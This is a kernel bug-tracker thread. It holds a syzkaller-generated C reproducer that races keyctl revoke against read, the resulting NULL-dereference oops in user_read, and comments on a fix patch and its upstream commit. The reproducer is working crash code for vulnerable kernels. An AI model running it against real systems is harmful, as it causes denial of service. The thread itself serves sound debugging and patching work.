On upstream commit 6764e5ebd5c62236d082f9ae030674467d0b2779 (Dec 9). The following program causes GPF in keyctl: // autogenerated by syzkaller (http://github.com/google/syzkaller) #include <syscall.h> #include <string.h> #include <stdint.h> #include <pthread.h> long r4; void *thr0(void *arg) { long r5 = syscall(SYS_keyctl, 0x3ul, r4, 0, 0, 0, 0); return 0; } void *thr1(void *arg) { long r6 = syscall(SYS_keyctl, 0xbul, r4, 0x20000000ul, 0x1000ul, 0, 0); return 0; } int main() { long r0 = syscall(SYS_mmap, 0x20000000ul, 0x10000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); memcpy((void*)0x20000e56, "\x75\x73\x65\x72\x00", 5); memcpy((void*)0x2000074a, "\x25\x00", 2); memcpy((void*)0x20000f77, "\x56\x47\x22\x1d\x9e\xa4\xd3\xf5\x4d\x1b\xd5\xf9\x3f\x92\xd5\xad\x79\xd9\x74\x5a\xda\x21\x45\x09\x3c\xed\x24\x31\x0c\x57\x3f\x4d\xe7\xe0\x3e\x5a\xb2\xb3\xf5\x57\x51\x17\xb7\xa3\x61\xc1\xb7\xc1\xf2\x16\x3a\xb4\x8e\x28\xd0\xcc\x1b\xbb\x4c\x4f\x3e\x90\x6f\x1a\xe2\xe8\x99\x52\x8a\x8a\x10\x6b\x60\xd7\x27\x83\xe0\x70\xc9\x7d\x6d\x25\xa3\xd6\x8c\xf0\x08\xba\xc7\x56\xff\xd6\xd6\x62\xa0\xa5\x54\x5c\xfe\x45\x86\xd3\x39\x6a\xf9\x13\x34\x7a\x0c\xc7\x7e\x87\x44\xb7\x10\x2c\xc5\x75\xe0\x17\x35\xdf\xfe\x98\x6b\xf5\xbc\x0b\xbf\x21\xf8\x6d\x14\x3c\x23\x78\x6e", 137); r4 = syscall(SYS_add_key, 0x20000e56ul, 0x2000074aul, 0x20000f77ul, 0x89ul, 0xfffffffffffffffcul, 0); pthread_t th[5]; pthread_create(&th[0], 0, thr0, 0); pthread_create(&th[1], 0, thr1, 0); pthread_create(&th[2], 0, thr0, 0); pthread_create(&th[3], 0, thr1, 0); pthread_join(th[0], 0); pthread_join(th[1], 0); pthread_join(th[2], 0); pthread_join(th[3], 0); return 0; } BUG: unable to handle kernel NULL pointer dereference at 0000000000000010 IP: [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196 PGD 35b9b067 PUD 34c71067 PMD 0 Oops: 0000 [#1] SMP Modules linked in: CPU: 1 PID: 7020 Comm: a.out Not tainted 4.4.0-rc4+ #53 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 task: ffff88003243db00 ti: ffff8800364f0000 task.ti: ffff8800364f0000 RIP: 0010:[<ffffffff816870b7>] [<ffffffff816870b7>] user_read+0x37/0xb0 RSP: 0018:ffff8800364f3ee0 EFLAGS: 00010206 RAX: 0000000000000001 RBX: ffff8800008a8000 RCX: 0000000000000001 RDX: 0000000000000001 RSI: 0000000020000000 RDI: ffff8800008a8000 RBP: ffff8800364f3f00 R08: 0000000000000000 R09: 0000000000000001 R10: ffff88003243db00 R11: ffff88003243e2b8 R12: 0000000000001000 R13: 0000000020000000 R14: 0000000000000000 R15: 0000000000001000 FS: 00007ff559f38700(0000) GS:ffff88003ed00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000000010 CR3: 0000000035fe6000 CR4: 00000000000006e0 Stack: ffffffffffffffa1 ffff8800008a8020 ffff8800008a8000 0000000020000000 ffff8800364f3f38 ffffffff81683d7a 00007ff559f38700 0000000000000000 0000000000000000 00007ff559f389c0 00007ff559f38700 ffff8800364f3f48 Call Trace: [<ffffffff81683d7a>] keyctl_read_key+0xba/0xf0 security/keys/keyctl.c:761 [< inline >] SYSC_keyctl security/keys/keyctl.c:1595 [<ffffffff81684bd4>] SyS_keyctl+0xa4/0x170 security/keys/keyctl.c:1553 [<ffffffff823fe676>] entry_SYSCALL_64_fastpath+0x16/0x7a arch/x86/entry/entry_64.S:185 Code: 54 49 89 d4 53 48 89 fb e8 27 bc a9 ff 85 c0 74 10 80 3d b0 a7 70 01 00 75 07 48 83 7b 20 00 74 57 4c 8b b3 f0 00 00 00 4d 85 ed <41> 0f b7 5e 10 74 3a 4d 85 e4 74 35 49 39 dc be dc 02 00 00 48 RIP [<ffffffff816870b7>] user_read+0x37/0xb0 security/keys/user_defined.c:196 RSP <ffff8800364f3ee0> CR2: 0000000000000010 ---[ end trace acbace9643063ebd ]---
Created attachment 1104416 [details] Simplified testcase Here's a cleaned up version of the testcase.
Compile the cleaned up testcase with: make keyctl-gpf LDLIBS="-lpthread -lkeyutils"
Created attachment 1104753 [details] Patch to fix race between read and revoke
(In reply to David Howells from comment #3) > Created attachment 1104753 [details] > Patch to fix race between read and revoke This probably needs the "Cc: stable.org" tag in the commit log when you send it upstream.
This went upstream as commit b4a1b4f5047e4f54e194681125c74c0aa64d637d